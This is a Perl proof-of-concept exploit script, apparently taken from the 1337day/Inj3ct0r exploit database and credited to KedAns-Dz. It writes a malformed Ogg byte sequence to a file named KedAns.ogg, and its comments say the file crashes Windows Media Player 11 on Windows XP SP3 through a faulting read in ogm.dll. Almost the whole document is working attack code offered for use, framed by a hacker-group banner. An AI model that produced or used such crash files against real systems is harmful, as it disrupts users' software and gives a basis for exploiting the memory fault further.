#!/usr/bin/perl sub logo { print STDERR << "EOF"; 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 EOF } # --------- # Windows Media Player 11 (.ogg) Proof Of Concept Exploit # Author : KedAns-Dz # special thanks to : Inj3ct0r Team + exploit-id Team # --------- # Tested in Windows XP sp3 France # Creating The Bad File .OGG And => Bo0M ! # Stack Fram : ogm.dll ! 02B62026 () ! # PoC : 0x02B62026 | MOV | ecx,dword ptr [eax] my $PoC = "\x4f\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\xb7\x7a". "\x00\x00\x00\x00\x00\x00\x73\x6f\x69\x92\x01\x1e\x01\x76\x6f\x72". "\x62\x69\x73\x00\x00\x00\x00\x02\x80\xbb\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\xbb\x01\x4f\x67\x67\x53\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\xb7\x7a\x00\x00\x01\x00\x00\x00"; open (FILE,">> KedAns.ogg"); # Bad File Here print FILE $PoC; close (FILE); # KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans